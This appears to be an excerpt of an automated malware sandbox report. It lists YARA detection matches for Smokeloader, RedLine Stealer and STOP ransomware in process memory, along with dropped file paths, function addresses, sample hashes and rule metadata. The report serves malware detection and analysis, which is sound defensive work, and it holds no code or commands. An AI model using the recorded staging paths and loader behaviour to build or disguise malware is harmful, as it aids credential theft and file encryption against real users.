Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 2A57.exe.1.dr Static PE information: .vmp0 and .vmp1 section names
Source: C:\Users\user\AppData\Local\Temp\3804.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004022E9 0_2_004022E9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004184DE 0_2_004184DE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A101 0_2_0041A101
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418A22 0_2_00418A22
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004132DB 0_2_004132DB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BD0 0_2_00409BD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413B84 0_2_00413B84
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E390 0_2_0040E390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00413F90 0_2_00413F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417F9A 0_2_00417F9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004137B0 0_2_004137B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004143B0 0_2_004143B0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004184DE 4_2_004184DE
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0041A101 4_2_0041A101
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00418A22 4_2_00418A22
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004132DB 4_2_004132DB
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00409BD0 4_2_00409BD0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00413B84 4_2_00413B84
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_0040E390 4_2_0040E390
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00413F90 4_2_00413F90
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_00417F9A 4_2_00417F9A
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004137B0 4_2_004137B0
Source: C:\Users\user\AppData\Roaming\tfgatra Code function: 4_2_004143B0 4_2_004143B0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004184DE 6_2_004184DE
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0041A101 6_2_0041A101
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00418A22 6_2_00418A22
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004132DB 6_2_004132DB
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00409BD0 6_2_00409BD0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00413B84 6_2_00413B84
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_0040E390 6_2_0040E390
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00413F90 6_2_00413F90
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_00417F9A 6_2_00417F9A
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004137B0 6_2_004137B0
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Code function: 6_2_004143B0 6_2_004143B0
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\2A57.exe A8756585EF0E2E4E7479606E49A56E52C871C24B65C356B6B38F29CBAE300ECC
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 9.0.ECFD.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.ECFD.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.ECFD.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.ECFD.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.624566316.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000000.533159957.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.522204411.00000000007C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000000.529399844.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000000.499608553.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
